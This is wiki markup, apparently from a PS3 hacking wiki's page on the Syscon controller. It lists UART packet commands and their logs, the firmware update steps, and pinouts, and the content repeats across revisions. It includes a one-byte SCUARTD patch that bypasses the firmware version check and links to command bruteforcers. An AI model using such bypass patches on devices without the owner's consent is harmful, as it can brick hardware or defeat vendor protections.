|-<br /> | 0x11 || '''xdrdiag start''' || XDR diagnostics || Starts XDR diagnostics<br /> |-<br /> | 0x12 || '''xdrdiag result''' || XDR diagnostics || Gets a result of XDR diagnostics<br /> |-<br /> | 0x13 || '''xiodiag''' || XIO diagnostics || Starts XIO diagnostics and gets a result of it<br /> |-<br /> | 0x14 || '''fandiag''' || Fan diagnostics || Retrieves RPMs of fans<br /> |-<br /> | 0x15 || '''errlog''' || Error log || Retrieves a list of codes (with timestamps) of latest errors<br /> |-<br /> | 0x16 || ''Read line'' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || Reference Tool's temperature || Gets the temperature of reference tool<br /> |-<br /> | 0x18 || rowspan=&quot;7&quot; colspan=&quot;3&quot; style=&quot;background:lightgrey; color:#ff0000; text-align: center;&quot; | Invalid CMDs<br /> |-<br /> | 0x19<br /> |-<br /> | 0x1A<br /> |-<br /> | 0x1B<br /> |-<br /> | 0x1C<br /> |-<br /> | 0x1E<br /> |-<br /> | 0x1F<br /> |-<br /> | 0x20 || '''cp beepremote''' || ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || ||<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || ||<br /> |-<br /> | ?? || '''csum''' || Checksum ?? || Calculates the Checksum of something (No packet ID listing on scuartd)<br /> |-<br /> | ?? || '''osbo''' || ??? || No idea what this does, but returns &lt;pre&gt;done&lt;/pre&gt; when it's sent &lt;!--Operative System Boot Order ?... something related with gameOS/otherOS boot flag ? --&gt;<br /> |-<br /> | ?? || '''scopen''' || returns SC_READY or ERROR 1 || ???<br /> |-<br /> | ?? || '''scclose''' || || ???<br /> |-<br /> |}<br /> <br /> === Packets Logs ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Logs !! Notes<br /> |-<br /> | 0x00 || '''version''' || &lt;pre&gt; version\nv1.0.4_c2\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x01 || '''bringup''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x02 || '''shutdown''' || &lt;pre&gt; Do nothing. (PowerOff State)\n (END) &lt;/pre&gt; || Returns (END) if the system is on <br /> |-<br /> | 0x03 || '''firmud''' || &lt;pre&gt; Start...\nErase User Program Area\n (END) &lt;/pre&gt; || This will brick your SYSCON if you don't feed it any argument or feed to it the wrong argument!<br /> |-<br /> | 0x04 || '''bsn''' || &lt;pre&gt; bsn\nNANNNNNNNNNA\n (END) &lt;/pre&gt; || N is digit and A is char (removed for privacy)<br /> |-<br /> | 0x05 || '''halt''' || &lt;pre&gt; halt\n (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x06 || '''cp ready''' || &lt;pre&gt; cp ready\nCP READY: OK\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x07 || '''cp busy''' || &lt;pre&gt; cp ready\nCP BUSY: OK\n (END) &lt;/pre&gt; || STATUS light blinks forever<br /> |-<br /> | 0x08 || '''cp reset''' || No response || Should reset CP to factory settings<br /> |-<br /> | 0x09 || '''bestat''' || &lt;pre&gt; (PowerOff State)\n (END) &lt;/pre&gt;||<br /> |-<br /> | 0x0A || '''powersw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || &lt;pre&gt; BOOT BEEP: ON\n (END) &lt;/pre&gt; || when it's off BOOT BEEP status changes to OFF<br /> |-<br /> | 0x0D || '''bootbeep on''' || &lt;pre&gt; BOOT BEEP ON: DONE\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x0E || '''bootbeep off''' || &lt;pre&gt; BOOT BEEP OFF: DONE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0F || '''Reset syscon''' || ||<br /> |-<br /> | 0x10 || '''xdrdiag info''' || &lt;pre&gt; 32\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || &lt;pre&gt; DIAG START\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x12 || '''xdrdiag result''' || &lt;pre&gt; XDR OK\n (END) &lt;/pre&gt; || will return ERROR NOT STARTED if xdrdiag start wasn't run previously<br /> |-<br /> | 0x13 || '''xiodiag''' || &lt;pre&gt; 0 903\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x14 || '''fandiag''' || &lt;pre&gt; ERROR FAN ACTIVE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x15 || '''errlog''' || &lt;pre&gt; ofst[ %d]:err_code:0x%08X, clock:0x%08X YYYY/MM/DD HH:MM:SS &lt;/pre&gt; || bunch of error logs. ends with (END) once they're over<br /> |-<br /> | 0x16 || '''Read line''' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || <br /> |-<br /> | 0x20 || '''cp beepremote''' || &lt;pre&gt; (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends a beep different than SYSCON beep :)<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends two beeps different than SYSCON beeps :)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027460C9] [68269779] [C19A855E]\n (END)&lt;/pre&gt; || displays 3 hexadecimal numbers inside rect parenthesis. the numbers are always the same, except when syscon version changes (v1.0.5_c1) <br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02746F91] [682F04DA] [27688CF5]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c2)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [0274C877] [684DA659] [EA426BB1]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027B4064] [6B450C64] [4FBF6DA3]\n (END)&lt;/pre&gt; || Another response (v1.0.3_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027E1B71] [6CDA9F25] [E0C67065]\n (END)&lt;/pre&gt; || Another response (v1.0.1_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02812855] [6E83917C] [D40F70A5]\n (END)&lt;/pre&gt; || Another response (v0.9.14_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02835059] [6FC5C632] [BB9BBEC3]\n (END)&lt;/pre&gt; || Another response (v0.9.9_c1)<br /> |-<br /> | ?? || '''osbo''' || &lt;pre&gt;done\n (END)&lt;/pre&gt; ||<br /> |-<br /> |}<br /> <br /> === Notes ===<br /> <br /> * Some commands are unavailable on earlier firmwares, for example, tmpforcp is only supported on 1.3.3+.<br /> * Some commands are divided into several strings, the first part (if exists) describes a command group, the second part describes the actual command and other parts describes command arguments.<br /> * Real syscon commands have an ASCII form (a bold text in the 2nd column) instead of bytes above.<br /> * Packet with ID *0x03* notifies syscon and calls SX program (based on ZMODEM protocol) to send firmware, syscon have custom or original implementation of RX program to receive firmware. An implementation of ZMODEM protocol used by Sony: http://oss.sony.net/Products/Linux/Others/Download/DECR-1000/mips_fp_le-lrzsz-0.12.20-devtool.1.src.rpm<br /> <br /> A start of syscon's update procedure:<br /> * A CP development tool includes several scripts which are participated in syscon update procedure. It starts after a CP update via ''update_syscon.pl'' perl script.<br /> * This script checks the current syscon's firmware version. If it is in mask rom then it skips an update procedure, if not it checks major/minor/release parts of both versions and if a new version is applicable then it launches ''scfirmup'' utility and pass the firmware file path as an argument.<br /> * ''scfirmup'' is a stupid tool which prepares a connection to SCUARTD and sends an update packet with a file path inside it. There is no need to comment it, here is reimplementation: http://pastie.org/private/6h8mfeoics4mdxear7ayg<br /> <br /> A syscon's update operation in '''SCUARTD''' consists of following steps:<br /> * 1. Check if ''SX'' program presents in ''/usr/bin/sx''. It should be a regular file.<br /> * 2. Check if specified firmware file is a regular file.<br /> * 3. Halt syscon by sending command '''halt''' to UART, then wait some time until it prints ''HALT: OK''.<br /> * 4. Reset syscon by sending byte ''0x30'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> * 5. Get current syscon's firmwave version by sending command '''version''' to UART. After receiving it, look for a character after the first ''_'' (underscore) symbol from the left side of string and if it equals to the character ''b'', then proceed to the next step, otherwise go to the (8) step. (It is possible to patch this step to allow upgrading or downgrading at will)<br /> * 6. Prepare syscon for an update by sending command '''firmud''' to UART, then fork the current process; the current process won't finish until a message ''Done'' from UART arrives (it is the end of update operation).<br /> * 7. In the forked process start ''SX'' program and pass firmware file path to it. ''SX'' program reads firmware file and transfer each chunk of it to syscon.<br /> * 8. After successful update operation reset syscon (a different way) by sending byte ''0x31'' to GPIO register '''SC_PI0_DIPSW''', byte ''0x30'' to GPIO register '''SC_RSTX''', waiting 1 second and writing byte ''0x31'' to GPIO register '''SC_RSTX'''.<br /> <br /> Notes:<br /> * It seems all scuartds checks firmware revision and probably syscon is updated only once (after factory).<br /> * To be able to reflash it you need to patch ''SCUARTD'' or do a manual update without the use of ''SCUARTD''.<br /> * You need to patch a single byte in ''SCUARTD'' to be able to flash any firmware (for example, to downgrade your syscon).<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:00403A94: /* scuartd from CP 1.3.3 */<br /> lb $v1, 1($v0)<br /> li $v0, &quot;b&quot; /* 62 00 02 24 -&gt; 63 00 02 24 */<br /> bne $v1, $v0, loc_4039F4<br /> move $a0, $zero<br /> &lt;/syntaxhighlight&gt;<br /> * An actual firmware update process (without halting and resetting steps) takes about 1 minute.<br /> * You cannot install a corrupted firmware with scfirmup unless you corrupt the header! It seems there is a hash of sorts (possibly of the plaintext) in the header preventing scfirmud from installing something corrupt<br /> * Updating SYSCON requires the DECR to be in standby mode! You cannot update it while it is on.<br /> * Corrupting the header and the body will make firmup install the SYSCON update anyways! be careful not to do it!<br /> * Should you brick SYSCON, here's a patch to &quot;unbrick&quot; it, do not use it unless you brick it though!<br /> &lt;syntaxhighlight lang=&quot;asm&quot;&gt;<br /> .text:004038C0:<br /> lw $a0, 4($s4)<br /> li $a1, 0x400000<br /> nop<br /> addiu $a1, (aHalt - 0x400000) # &quot;halt&quot;<br /> la $t9, scuartd_send_sccmd<br /> nop<br /> jalr $t9 ; scuartd_send_sccmd<br /> nop<br /> lw $gp, 0x1E8+var_1D8($sp)<br /> bnez $v0, loc_4039B4 /* 33 00 40 14 -&gt; 33 00 40 10 */<br /> li $a0, 1<br /> &lt;/syntaxhighlight&gt;<br /> <br /> * You can use this bruteforcer to try your luck when finding new packets : https://hastebin.com/vomogesaru.cpp<br /> <br /> == Syscon UART ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | P16 || UART0_TxD || Serial Transmit<br /> |-<br /> | P15 || UART0_RxD || Serial Receive<br /> |-<br /> |}<br /> <br /> You can attach a 3.3v TTL cable (LV-TTL) to the UART on syscon (UART0_TxD, UART0_RxD). (Convenient solder points are available on JSD/JTP-001 by the NOR test points. They are marked as '?' in [[:File:JSD-001 NOR - nor testpoints.png|marcan' noraliser / judges' NORway install picture]], closest to the ground at the bottom - RX is left, TX is right) Baud rate is 57600. There is a simple plaintext protocol involved. This varies on different syscon models. Example:<br /> <br /> '''&lt;command&gt;:&lt;hash&gt;'''<br /> <br /> Where the hash is the sum of command bytes &amp; 0xFF<br /> <br /> you should terminate commands with \r\n, the syscon messages are only terminated with \n<br /> <br /> === Samples ===<br /> Here are some of the commands/messages encountered:<br /> <br /> Messages:<br /> &lt;pre&gt;Power applied (standby mode)<br /> OK 00000000:3A<br /> <br /> Power on<br /> # (PowerOn State):7F<br /> <br /> Power off (Hard shutdown)<br /> # (PowerOff State):DD<br /> <br /> After Fan test:<br /> # (PowerOff State) (Fatal):36<br /> <br /> No text, invalid hash:<br /> NG F0000002:4D&lt;/pre&gt;<br /> <br /> Commands:<br /> &lt;pre&gt;VER:ED<br /> OK 00000000 S1E 00 00 065D:A4<br /> <br /> ERRLOG:CB<br /> OK 00000000:3A<br /> <br /> DATE:1E<br /> NG F0000003:4E<br /> <br /> C:F1:BUZ<br /> E:4F:NG F0000004<br /> <br /> C:D0:CID<br /> E:50:NG F0000005<br /> <br /> C:DA:EEP<br /> E:50:NG F0000005<br /> <br /> C:D5:FAN<br /> E:50:NG F0000005<br /> <br /> C:F4:KSV<br /> E:50:NG F0000005<br /> <br /> C:ED:REV<br /> E:50:NG F0000005<br /> <br /> C:F8:SPU<br /> E:50:NG F0000005&lt;/pre&gt;<br /> more [[Talk:System_Controller_Firmware#Syscon_commands|Syscon commands]]<br /> <br /> bruteforcing commands:&lt;!--// LOL //--&gt; http://pastebin.com/CNei0xbC&lt;br&gt;<br /> <br /> VERY IMPORTANT:<br /> * Max size of a command is 11 characters,16 if you count with C:&lt;hash&gt;:<br /> * Sending a command with 11 chars results in NO OUTPUT<br /> * Sending a command with more than 11 chars results in NG F0000002<br /> * Max size of a command on DECR is 135, 140 if you count with C:&lt;hash&gt;:<br /> <br /> == Syscon (SPI) EEPROM ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | F16 || CSB || Chip Select (needs to be low)<br /> |-<br /> | H16 || DO || Serial Data Output<br /> |-<br /> | G16 || DI || Serial Data Input<br /> |-<br /> | E16 || SKB || Serial Data Clock<br /> |-<br /> | J15 || WCB || Write Protect<br /> |-<br /> | J16 || RBB || Ready/Busy<br /> |-<br /> | G11 || VDDep || + 3.3V<br /> |-<br /> | C15 || VSSep || GND<br /> |-<br /> |}<br /> <br /> == Syscon JTAG ==<br /> disabled in factory after production on retailmodels<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | L8 || JRTCK || Return Test Clock<br /> |-<br /> | K8 || JTCK || Test Clock<br /> |-<br /> | K9 || JTDO || Test Data Out<br /> |-<br /> | L9 || JTMS || Test Mode State / Test Mode Select<br /> |-<br /> | K7 || JTDI || Test Data In<br /> |-<br /> | L7 || JNTRST || Test Reset<br /> |-<br /> |}<br /> <br /> = Syscon Underlaying ports =<br /> == Syscon Cell SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | M2 || /BE_SPI_CS || Chip Select<br /> |-<br /> | N2 || BE_SPI_DO || Serial Data Output<br /> |-<br /> | M1 || BE_SPI_DI || Serial Data Input<br /> |-<br /> | N1 || BE_SPI_CLK || Serial Data Clock<br /> |-<br /> | P2 || /BE_RESET || CellBE Reset<br /> |-<br /> | P1 || BE_POWGOOD || CellBE PowerGood<br /> |-<br /> | T2 || /BE_INT || CellBE Interrupt<br /> |-<br /> |}<br /> <br /> == Syscon Southbridge SPI Bus ==<br /> {| class=&quot;wikitable&quot;<br /> ! BGA !! Name !! Description<br /> |-<br /> | B9 || /SB_SPI_CS || Chip Select<br /> |-<br /> | B8 || SB_SPI_DO || Serial Data Output<br /> |-<br /> | A9 || SB_SPI_DI || Serial Data Input<br /> |-<br /> | A8 || SB_SPI_CLK || Serial Data Clock<br /> |-<br /> |}<br /> <br /> &lt;!--// Remote Power ON/OFF (from network, HDMI CEC commands, etc...) is managed by devices connected to the southbridge (ethernet/wifi/BT, HDMI controller, etc...) //--&gt;<br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Syscon_Hardware&diff=44687 Syscon Hardware 2017-07-07T13:24:51Z <p>Mathieulh: /* Notes */ still typo</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SYSCON_GEN1.JPG|thumb|Syscon 1st Generation (BGA Packaging)]]&lt;br /&gt;[[File:Pyramid Syscon live probing.jpg|thumb|Pyramid Syscon live probing]]&lt;/div&gt;<br /> <br /> Syscon is the main power controller chip. It is responsible for powering up the various power systems and for configuring and initialising the [[CELL BE]], [[RSX]] and [[South Bridge]]. It communicates with these devices via seperate SPI busses. There is external access by JTAG (disabled from factory on retail models), an EEPROM programming interface &lt;!-- not fully examined --&gt; and Serial (UART). The Syscon is a SoC and consists of an ARM7TDMI (ARMv4) CPU, a 256KB EEPROM and 16KB RAM.<br /> <br /> = Serialnumbers @ SKU =<br /> <br /> == Retail ==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Notes<br /> |-<br /> | [[CECHAxx]]&lt;br /&gt;[[CECHBxx]] || 0x01&lt;br /&gt;0x02 || [[COK-00x#COK-001|COK-001]] || [[CXR713120-201GB]] || 0B8E || <br /> |-<br /> | [[CECHCxx]]&lt;br /&gt;[[CECHExx]] || 0x03&lt;br /&gt;0x04 || [[COK-00x#COK-002|COK-002]] or&lt;br /&gt;[[COK-00x#COK-002W|COK-002W]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] || 0C16 || <br /> |-<br /> | [[CECHGxx]] || 0x05 || [[SEM-00x|SEM-001]] || [[CXR713120-201GB]] or&lt;br /&gt;[[CXR713120-202GB]] or&lt;br /&gt;[[CXR713120-203GB]] || 0D52 ||<br /> |-<br /> | [[CECHHxx]] || 0x06 || [[DIA-00x#DIA-001|DIA-001]] || [[CXR714120-301GB]] || 0DBF ||<br /> |-<br /> | [[CECHJxx]]&lt;br /&gt;[[CECHKxx]] || 0x07 || [[DIA-00x#DIA-002|DIA-002]] || [[CXR714120-301GB]] or&lt;br /&gt;[[CXR714120-302GB]] || 0E69 || <br /> |-<br /> | [[CECHLxx]]&lt;br /&gt;[[CECHMxx]]&lt;br /&gt;[[CECHPxx]]&lt;br /&gt;[[CECHQxx]] || 0x08 || [[VER-00x|VER-001]] || [[SW-301]] or&lt;br /&gt;[[SW-302]] || 065D ||<br /> |-<br /> | [[CECH-20xx]] || 0x09 || [[DYN-00x|DYN-001]] || [[SW2-301]] || 0832 || <br /> |-<br /> | [[CECH-21xx]] || 0x0A || [[SUR-00x|SUR-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] || 08A0 || <br /> |-<br /> | [[CECH-25xx]] || 0x0B || [[JTP-00x|JTP-001]] or&lt;br /&gt;[[JSD-00x|JSD-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]]&amp;nbsp;&amp;nbsp;or&lt;br /&gt;[[SW2-303]] || 08C2 || <br /> |-<br /> | [[CECH-30xx]] || 0x0C || [[KTE-00x|KTE-001]] || [[SW2-301]] or&lt;br /&gt;[[SW2-302]] or&lt;br /&gt;[[SW2-303]] || 0918 || <br /> |-<br /> | [[CECH-40xx]] || 0x0D || [[MSX-00x|MSX-001]] or&lt;br /&gt;[[MPX-00x|MPX-001]] || [[SW3-302]] || 098F || <br /> |-<br /> |}<br /> <br /> ==Non retail==<br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! [[SKU Models|Model]] !! [[IDPS|Type]] !! [[Motherboard Revisions|Board]] !! [[Syscon Hardware|Syscon&lt;br /&gt;part no.]] !! Syscon&lt;br /&gt;[[More System Information#First_section|Soft ID]] !! Active JTAG !! Notes<br /> |-<br /> | [[CEB-2040]] || - || [[MPU-501]] || [[CXR713F120|CXR713F120GB-000]] || || Yes || Retail prototype<br /> |-<br /> | [[DECR-1000|DECR1000(A/J)]] || 0x01 || [[TMU-520]] || [[CXR713F120A]] || 03FB || Yes || Reference tool<br /> |-<br /> | [[DEH-H1000A(S)(-E(S))]] || 0x01 || [[COK-001 (Prototype)]] || [[CXR713F120A]] || 0B67 || Yes || Preproduction<br /> |-<br /> | [[DEH-H1001-D]] || 0x01 || [[COOKIE-13]] || [[CXR713F120A]] || ?0B67? || Yes || Preproduction<br /> |-<br /> | [[DEH-FH1500J-A]] || || [[VERTIGO-02]] || || || || Preproduction<br /> |-<br /> &lt;!-- Not Prototype debug units - see retail --&gt;<br /> |}<br /> &lt;br/&gt;<br /> ----<br /> <br /> Not mentioned:&lt;pre&gt;<br /> 0F29 - ?<br /> 0F38 - ?&lt;/pre&gt;<br /> <br /> = Syscon Externalised Ports =<br /> '''Note:''' for more specific information per model, see the links to each subppage in the Serialnumbers @ SKU table.<br /> <br /> == Syscon UART packets ==<br /> <br /> === SCUART daemon (SCUARTD) packet structure ===<br /> <br /> SCUARTD packets includes header of 0x3 bytes and optional payload (depending on the command).<br /> Packet IDs are not important, they are used only by clients and processed by SCUART daemon. SCUART daemon opens terminal file /dev/ttyS0 and use it to send commands and receive responses.<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Size !! Description<br /> |-<br /> | 0x00 || 0x01 || Magic?<br /> |-<br /> | 0x01 || 0x01 || Payload size<br /> |-<br /> | 0x02 || 0x01 || Command<br /> |-<br /> | 0x03 || Payload size || Payload data<br /> |-<br /> |}<br /> <br /> === Packets ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Description !! Notes<br /> |-<br /> | 0x00 || '''version''' || Firmware version || Gets installed syscon's firmware version (Note: backup bank contains version 0.4.5_b4 !! On CEB-2030 it is 0.3.0 )<br /> |-<br /> | 0x01 || '''bringup''' || || &lt;!--// Standby-&gt;ON (Remote Power ON using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x02 || '''shutdown''' || || &lt;!--// ON-&gt;Standby (Remote Power OFF using an UART package, from [[Communication Processor]] ?) //--&gt;<br /> |-<br /> | 0x03 || '''firmud''' || Firmware update || Notifies about firmware update operation<br /> |-<br /> | 0x04 || '''bsn''' || Board Serial Number || Retrieves syscon's Board Serial Number<br /> |-<br /> | 0x05 || '''halt''' || || Used at start of firmware update operation<br /> |-<br /> | 0x06 || '''cp ready''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x07 || '''cp busy''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x08 || '''cp reset''' || || &lt;!--// [[Communication Processor]] related, for [[SKU_Models_Nonretail#Reference_Tool_.28Tool.2FDECR.29 | Tool/DECR models]] //--&gt;<br /> |-<br /> | 0x09 || '''bestat''' || Cell B.E. status || Retrieves Cell B.E. status<br /> |-<br /> | 0x0A || '''powersw''' || &lt;!-- Power switch ? --&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;!-- Reset switch ? --&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || ||<br /> |-<br /> | 0x0D || '''bootbeep on''' || ||<br /> |-<br /> | 0x0E || '''bootbeep off''' || ||<br /> |-<br /> | 0x0F || ''Reset syscon'' || Reset || Resets syscon<br /> |-<br /> | 0x10 || '''xdrdiag info''' || XDR diagnostics ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || XDR diagnostics || Starts XDR diagnostics<br /> |-<br /> | 0x12 || '''xdrdiag result''' || XDR diagnostics || Gets a result of XDR diagnostics<br /> |-<br /> | 0x13 || '''xiodiag''' || XIO diagnostics || Starts XIO diagnostics and gets a result of it<br /> |-<br /> | 0x14 || '''fandiag''' || Fan diagnostics || Retrieves RPMs of fans<br /> |-<br /> | 0x15 || '''errlog''' || Error log || Retrieves a list of codes (with timestamps) of latest errors<br /> |-<br /> | 0x16 || ''Read line'' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || Reference Tool's temperature || Gets the temperature of reference tool<br /> |-<br /> | 0x18 || rowspan=&quot;7&quot; colspan=&quot;3&quot; style=&quot;background:lightgrey; color:#ff0000; text-align: center;&quot; | Invalid CMDs<br /> |-<br /> | 0x19<br /> |-<br /> | 0x1A<br /> |-<br /> | 0x1B<br /> |-<br /> | 0x1C<br /> |-<br /> | 0x1E<br /> |-<br /> | 0x1F<br /> |-<br /> | 0x20 || '''cp beepremote''' || ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || ||<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || ||<br /> |-<br /> | ?? || '''csum''' || Checksum ?? || Calculates the Checksum of something (No packet ID listing on scuartd)<br /> |-<br /> | ?? || '''osbo''' || ??? || No idea what this does, but returns &lt;pre&gt;done&lt;/pre&gt; when it's sent &lt;!--Operative System Boot Order ?... something related with gameOS/otherOS boot flag ? --&gt;<br /> |-<br /> | ?? || '''scopen''' || returns SC_READY or ERROR 1 || ???<br /> |-<br /> | ?? || '''scclose''' || || ???<br /> |-<br /> |}<br /> <br /> === Packets Logs ===<br /> <br /> {| class=&quot;wikitable&quot;<br /> ! Packet ID !! Command/Action !! Logs !! Notes<br /> |-<br /> | 0x00 || '''version''' || &lt;pre&gt; version\nv1.0.4_c2\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x01 || '''bringup''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x02 || '''shutdown''' || &lt;pre&gt; Do nothing. (PowerOff State)\n (END) &lt;/pre&gt; || Returns (END) if the system is on <br /> |-<br /> | 0x03 || '''firmud''' || &lt;pre&gt; Start...\nErase User Program Area\n (END) &lt;/pre&gt; || This will brick your SYSCON if you don't feed it any argument or feed to it the wrong argument!<br /> |-<br /> | 0x04 || '''bsn''' || &lt;pre&gt; bsn\nNANNNNNNNNNA\n (END) &lt;/pre&gt; || N is digit and A is char (removed for privacy)<br /> |-<br /> | 0x05 || '''halt''' || &lt;pre&gt; halt\n (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x06 || '''cp ready''' || &lt;pre&gt; cp ready\nCP READY: OK\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x07 || '''cp busy''' || &lt;pre&gt; cp ready\nCP BUSY: OK\n (END) &lt;/pre&gt; || STATUS light blinks forever<br /> |-<br /> | 0x08 || '''cp reset''' || No response || Should reset CP to factory settings<br /> |-<br /> | 0x09 || '''bestat''' || &lt;pre&gt; (PowerOff State)\n (END) &lt;/pre&gt;||<br /> |-<br /> | 0x0A || '''powersw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0B || '''resetsw''' || &lt;pre&gt; (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0C || '''bootbeep stat''' || &lt;pre&gt; BOOT BEEP: ON\n (END) &lt;/pre&gt; || when it's off BOOT BEEP status changes to OFF<br /> |-<br /> | 0x0D || '''bootbeep on''' || &lt;pre&gt; BOOT BEEP ON: DONE\n (END) &lt;/pre&gt; || <br /> |-<br /> | 0x0E || '''bootbeep off''' || &lt;pre&gt; BOOT BEEP OFF: DONE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x0F || '''Reset syscon''' || ||<br /> |-<br /> | 0x10 || '''xdrdiag info''' || &lt;pre&gt; 32\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x11 || '''xdrdiag start''' || &lt;pre&gt; DIAG START\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x12 || '''xdrdiag result''' || &lt;pre&gt; XDR OK\n (END) &lt;/pre&gt; || will return ERROR NOT STARTED if xdrdiag start wasn't run previously<br /> |-<br /> | 0x13 || '''xiodiag''' || &lt;pre&gt; 0 903\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x14 || '''fandiag''' || &lt;pre&gt; ERROR FAN ACTIVE\n (END) &lt;/pre&gt; ||<br /> |-<br /> | 0x15 || '''errlog''' || &lt;pre&gt; ofst[ %d]:err_code:0x%08X, clock:0x%08X YYYY/MM/DD HH:MM:SS &lt;/pre&gt; || bunch of error logs. ends with (END) once they're over<br /> |-<br /> | 0x16 || '''Read line''' || ||<br /> |-<br /> | 0x17 || '''tmpforcp &lt;zone ID&gt;''' || <br /> |-<br /> | 0x20 || '''cp beepremote''' || &lt;pre&gt; (END)&lt;/pre&gt; ||<br /> |-<br /> | 0x21 || '''cp beep2kn1n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends a beep different than SYSCON beep :)<br /> |-<br /> | 0x22 || '''cp beep2kn2n3''' || &lt;pre&gt; (END)&lt;/pre&gt; || sends two beeps different than SYSCON beeps :)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027460C9] [68269779] [C19A855E]\n (END)&lt;/pre&gt; || displays 3 hexadecimal numbers inside rect parenthesis. the numbers are always the same, except when syscon version changes (v1.0.5_c1) <br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02746F91] [682F04DA] [27688CF5]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c2)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [0274C877] [684DA659] [EA426BB1]\n (END)&lt;/pre&gt; || Another response (v1.0.4_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027B4064] [6B450C64] [4FBF6DA3]\n (END)&lt;/pre&gt; || Another response (v1.0.3_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [027E1B71] [6CDA9F25] [E0C67065]\n (END)&lt;/pre&gt; || Another response (v1.0.1_c1)<br /> |-<br /> | ?? || '''csum''' || &lt;pre&gt;Checksum: [02812855] [6E83917C] [D40F70A5]\n (END)&lt;/pre&gt; || Another response (v0.9.14_c1)<br /> |-<br /> | ?? 